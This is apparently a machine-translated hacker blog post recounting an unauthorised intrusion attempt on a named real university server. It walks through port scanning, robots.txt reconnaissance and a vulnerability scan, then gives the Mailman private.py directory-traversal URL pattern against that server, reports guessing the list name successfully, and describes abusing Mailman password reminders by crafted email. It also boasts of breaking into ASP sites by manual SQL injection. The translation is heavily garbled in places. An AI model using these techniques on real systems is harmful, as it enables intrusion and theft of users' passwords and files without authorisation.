Brief introduction to a foreign university website

This time I will talk about a port. Many people think that X-Scan is outdated, and almost no one uses X-Scan. If you want to launch a foreign website with the rise of some hackers, it will be a brute-force attack of tools instead of a hacker or a hacker. There is no technical content at all, which is really helpless. A few days ago, tank asked me how php manual injection statements are so simple.

This time I will talk about a port.

Many people think that X-Scan is outdated, and almost no one uses X-Scan. If you want to launch a foreign website with the rise of some hackers, it will be a brute-force attack of tools instead of a hacker or a hacker. There is no technical content at all, which is really helpless.

A few days ago, tank asked me howPhpIs the manual injection Statement? Being Simple does not mean being difficult. In China, almost all websites with injection points have been intruded, but their methods, tools, or a flood of 0day are detailed. Let's look at another actual point. This evening I met an asp Website with an injection point. However, scanning with tools is totally incorrect. I just want to say that I look down on you. In this case, I used the original manual asp injection and Combined Query. The password came out in about 20 minutes.

Go in. The website is clean and has never been intruded ...... Helpless ,,,,,

To be honest, this manual asp Combined Query injection is not difficult. Three URLs end the battle. ,. Yes.

Let's get back to the topic.

He and Tom are engaged in the United States tonight.EdU.

Ne. oregonStatE. eDu

I simply scanned the server and found it was on.

Www: 1, 443

Www: 1, 8000

Ftp: 21

Www: 80

Ssh: 22

I'm curious about using the www protocol's port 443:

Http://ne.oregonstate.edu: Error in 443 results ...... Dizzy. Now, it's https.

Https://ne.oregonstate.edu saw the interface

Input https://ne.oregonstate.edu/robots.txt

See these things:

User-agent :*

Disallow:/adminisTrAtor/

Disallow:/cache/

Disallow:/components/

Disallow:/images/

Disallow:/INcLudes/

Disallow:/installation/

Disallow:/language/

Disallow:/libraries/

Disallow:/media/

Disallow:/modules/

Disallow:/plugins/

Disallow:/templates/

Disallow:/tmp/

Disallow:/xmlrpc/

Disallow :/*?

Disallow:/*/resources/

Disallow:/classes/eecs/fall2009/cs515/

Copy code

Invalid Access Directory administrator. Apparently, according to the first figure, this is a new ssl website.

Okay, I finally opened it.X-Scan(:Http://www.heibai.net/download/Soft/Soft_3870.htm), Scan, vulnerability, maiman

Many people do not like X-Scan because X-Scan is a detection software rather than an intrusion software. In fact, this kind of software is deeper and more rare than the intrusion software, so that you can learn to analyze it, so that you don't get lost in tools and become a real fool.

The detection report says this:

Mailman private. py directory Redirection Vulnerability

The target host runs the Mailman mail list service.

Its Cgi/private. py storage has the directory jump vulnerability. This vulnerability occurs when the Web service does not filter additional slashes on the URL, such as Apache 1.3.x. This vulnerability allows users on the list to use special web requests, attackers can use web Service Permissions to obtain arbitrary files on the host, including the email addresses and passwords of any users stored on the host.

* ***** NesSuS detects this host Vulnerability

* ***** The Mailman version number installed on the host

****.

See http://lists.netsys.com/pipeRmAil/fully-disclosure/2005-February/031562.html

& Nb

Sp; solution: Update Mailman 2.1.6 as soon as possible or fix it using the description in the previous url

Risk Level: high

X-Scan has no test address in Chinese. The actual test address is:

Http: // $ target/mailman/private/$ listname /... /... /// Mailman? Username = $ user & password = $ pass

The actual website is

Https://ne.oregonstate.edu/mailman/private/?listname /... /... /// Mailman? Username = $ user & password = $ pass

However, a list error is prompted.

The following is to guess the mail list. It is the same as the injection and guessing table segment.

Https://ne.oregonstate.edu/mailman/private/?listname /... /... /// Mailman? Username = $ user & password = $ pass

Replace $ listname with the table name. I guess admin, root, and newlist have been guessed for a long time. Check the configuration method:

1. Install the mail list program

Apt-get install mailman

2. Modify/etc/mailman/mm_cfg.py. This server usesExIm4 as email service

DEFAULT_EMAIL_HOST = 'lists .mydomain.com'

DEFAULT_URL_HOST = 'www .mydomain.com'

MTA = None

3. Add the default email list newlist mailman.

The default value is mailman. Enter mailman to try.

Https://ne.oregonstate.edu/mailman/private/mailman /... /... /// Mailman? Username = $ user & password = $ pass

Actually succeeded ...... Depressed ......

The following describes how to include any existing user name and password in the url & user and $ pass.

Attackers can use web Service Permissions to obtain arbitrary files on the host, including the email addresses and passwords of any users stored on the host.

As for the "retrieve password" and database XX in the background, you can do it yourself.

However, it seems that it is not difficult to guess the password, although I have not succeeded. It is five o'clock in the morning ., Cannot help

Mailman password Traversal

This vulnerability exists in the version of the Mailman mailing list software.

Allows a list of users to traverse the passwords of any other users

By sending specially crafted mail information to the server.

Send a message to $ listnamerequest @ target, which includes the following lines:

PasswordDdRess = $ victim

Password address = $ subscriber

Copy code

The $ victim and $ subscriber passwords in the $ listname list are returned.

Note: Nessus has determined that this attack only exists by viewing the Mailman version number installed on the target machine.

$ List has been guessed ......

I admit that these are based on others. But it's always better than being said to be a bad injection attack. What else should we do? At least I think it is very practical to train people's penetration and analysis capabilities.

But its technical content is always better than those articles that are not put on asp websites all day long?